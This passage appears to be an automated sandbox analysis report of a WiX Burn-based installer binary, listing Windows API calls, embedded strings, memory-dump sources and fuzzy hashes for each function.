                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ece9eb7c8233ce75149e70c5b4bf33a68cf2a6b4ce45e0a75231743dd308ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8E04F34A84205BBEF201FA0FC06F283A6CFB12B41F104030FA0DE80E4E7A2E9109A45
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(D7B140E6,00000000,00000000,?), ref: 00936618
                                                                                                                                                                                                                                                                              • Part of subcall function 00931F7B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093628B,?,00000000,-00000008), ref: 00931FDC
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0093686A
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009368B0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00936953
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4a65d25d634e4a7def7c504204cdd49a83508b64710c34689575892b7f863c86
                                                                                                                                                                                                                                                                            • Instruction ID: 874240e1c64ef8b335c604bc7e60c1dde76e82dbf5cb9a13a681ddfb692d66e5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a65d25d634e4a7def7c504204cdd49a83508b64710c34689575892b7f863c86
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADD19D75D04249EFCF15CFA8C890AADBBB8FF49314F24852AE566EB351D630A942CF50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                            • Opcode ID: ebca2a9a3275a4645834e4f99eb1bae9c66cdcd749ea2f42d180aaf77cbcc2c2
                                                                                                                                                                                                                                                                            • Instruction ID: 658e65e3a3c8608de4b3a904df6fefc8c47a8294d7eefd55a325a4b496f3f867
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebca2a9a3275a4645834e4f99eb1bae9c66cdcd749ea2f42d180aaf77cbcc2c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 255108736092229FDB298F54FD41BBAB7A9FF41320F14442DE8055729AE735EC50C792
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 008EC932
                                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 008EC93A
                                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 008EC942
                                                                                                                                                                                                                                                                            • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 008EC96F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2d1624145d0fdc912b21009ef8e275f95f794e11fa4394b71af85ebd491434b6
                                                                                                                                                                                                                                                                            • Instruction ID: 997b9b6f847f03685bacd54a57ea3caced489e768286c0b1c423a1d7530c81d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d1624145d0fdc912b21009ef8e275f95f794e11fa4394b71af85ebd491434b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A111F75E5422CAADB249F55DC06BDEBBB8FF09B00F00809AB509A6281D6B45B808FD4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,?,?,008E85B0,00000000,?,008FA80F,?,00000001,00000000,?,00000002,-00000001,00000008,?), ref: 008EB4FE
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,00000000,?,?,008E85B0,00000000,?,008FA80F,?,00000001,00000000,?,00000002,-00000001), ref: 008EB55D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get visibility of variable: %ls, xrefs: 008EB52E
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EB540
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get visibility of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1405185440
                                                                                                                                                                                                                                                                            • Opcode ID: 4e3e3d898c28287a405788bb1042edcba0099736be838824e42b80c49633a4ce
                                                                                                                                                                                                                                                                            • Instruction ID: 04dcdf01a0cb18f16d7302cc11becb0da0a5aeb9fc8a3a5f7fe2587d2aafeae9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e3e3d898c28287a405788bb1042edcba0099736be838824e42b80c49633a4ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41018B75640258FFDF029F85CC0AEAE3BA4FB06766F008010FD15AB260D7B1AE10DBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml,008E7D97,008E7E0B,?,008E7E23,008E80EB), ref: 008EEB3A
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: SetEvent.KERNEL32(?,008E7E23,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23), ref: 0090ED5B
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: GetLastError.KERNEL32(?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml,008E7D97,008E7E0B,?), ref: 0090ED65
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: CloseHandle.KERNEL32(?,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml), ref: 0090EDE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: CloseHandle.KERNEL32(?,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml), ref: 0090EDF4
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: CloseHandle.KERNEL32(?,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml), ref: 0090EE07
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to close cabinet., xrefs: 008EEB14
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008EEB3A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\container.cpp, xrefs: 008EEB26
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$ErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to close cabinet.$d:\a\wix4\wix4\src\burn\engine\container.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 477349713-3805376996
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000), ref: 00938CFE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000,?,?,?,00936F4A,00000000), ref: 00938D0A
                                                                                                                                                                                                                                                                              • Part of subcall function 00938CD0: CloseHandle.KERNEL32(FFFFFFFE,00938D1A,?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000,?,?), ref: 00938CE0
                                                                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 00938D1A
                                                                                                                                                                                                                                                                              • Part of subcall function 00938C91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00938CC0,00937E3D,?,?,009369A7,?,00000000,00000000,?), ref: 00938CA4
                                                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000,?), ref: 00938D2F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 008E69E9
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,00000000), ref: 008E6A06
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E6A10
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008E6A17
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterErrorEventLastLeave
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2851136515-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0097D4F0,00000000,008FA8C6,00000008,?,00000000,00000000,?,?), ref: 0093AC99
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 0093ACB4
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0097D4F0), ref: 0093ACEE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$CloseEnterHandleLeave
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2394387412-727612987
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 0092A63B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variant.cpp, xrefs: 0090D99A
                                                                                                                                                                                                                                                                            • Failed to copy variant value., xrefs: 0090D988
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to copy variant value.$d:\a\wix4\wix4\src\burn\engine\variant.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-3907457943
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,008E6DEA,00000000,008E7162,00000000,00000257,54B7FF10), ref: 00918132
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00918188
                                                                                                                                                                                                                                                                            • Failed to add chained patch., xrefs: 00918176
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to add chained patch.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1868150798
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp, xrefs: 008E5641
                                                                                                                                                                                                                                                                            • Failed to resize array while inserting items, xrefs: 008E5632
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to resize array while inserting items$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-1811546269
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,008E6E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0094728C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to open uninstall key for potential related bundle: %ls, xrefs: 0094721F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 0094722E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpen
                                                                                                                                                                                                                                                                            • String ID: Failed to open uninstall key for potential related bundle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 47109696-3466351475
                                                                                                                                                                                                                                                                            • Opcode ID: fccf6f13f21f73512efd7763e08616fff65aba06aa257206b7701e93e40e1823
                                                                                                                                                                                                                                                                            • Instruction ID: 2ba121b265b12e66e7560759162b1725067912a2b97edd88c35ea4340d904adf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fccf6f13f21f73512efd7763e08616fff65aba06aa257206b7701e93e40e1823
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D216A76A0060DBFDB01DFA8C845E9EBBF9EF88314F108425EA55E3251D7B0AE009B51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,0093C4F6,00020006,?,?,00000000,00000000,00000000,008F7B5F,00000000,00000000,?,008F7B5F,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce), ref: 0093C55C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                                                            • String ID: Failed to create registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2289755597-627842214
                                                                                                                                                                                                                                                                            • Opcode ID: 2493dd6a62b08ec34c4a89cc7df5acb949ff3c4d2f153921e9328f22775a5f3e
                                                                                                                                                                                                                                                                            • Instruction ID: 286e7c1f5a79e59116a46823ea610399d4109ae220eba37151566b427296f1db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2493dd6a62b08ec34c4a89cc7df5acb949ff3c4d2f153921e9328f22775a5f3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D411E5B7604219BBDB109F229C09EAF3EADEBC6750F054029BE04E7250EA31DD11DB70
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: GetLastError.KERNEL32(?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439FF
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,00000008,00000008,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,0094850C), ref: 00948447
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to seek to start point in file., xrefs: 00948416
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00948425
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLastPointerWrite
                                                                                                                                                                                                                                                                            • String ID: Failed to seek to start point in file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 972348794-4104125422
                                                                                                                                                                                                                                                                            • Opcode ID: b6c90381bd65976704d230974f0240080539df36b10b2c210f7bcfd8e253fcde
                                                                                                                                                                                                                                                                            • Instruction ID: f32434779dc91995ceee016001311dc58679c9866247f1294c7f11a9e0fffe2c
